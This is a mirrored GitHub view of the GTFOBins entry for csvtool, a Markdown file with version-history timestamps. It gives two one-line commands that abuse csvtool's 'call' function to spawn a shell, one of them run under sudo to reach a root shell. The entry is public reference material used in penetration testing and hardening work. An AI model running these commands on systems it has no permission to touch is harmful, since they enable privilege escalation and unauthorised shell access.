1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00
GTFOBins.github.io/_gtfobins/csvtool.md

8 lines
147 B
Markdown
Raw Normal View History

2021-03-17 22:50:42 +01:00
---
functions:
shell:
2021-03-17 23:55:52 +01:00
- code: csvtool call '/bin/sh;false' /etc/passwd
2021-03-17 22:50:42 +01:00
sudo:
2021-03-17 23:55:52 +01:00
- code: sudo csvtool call '/bin/sh;false' /etc/passwd
2021-03-17 22:50:42 +01:00
---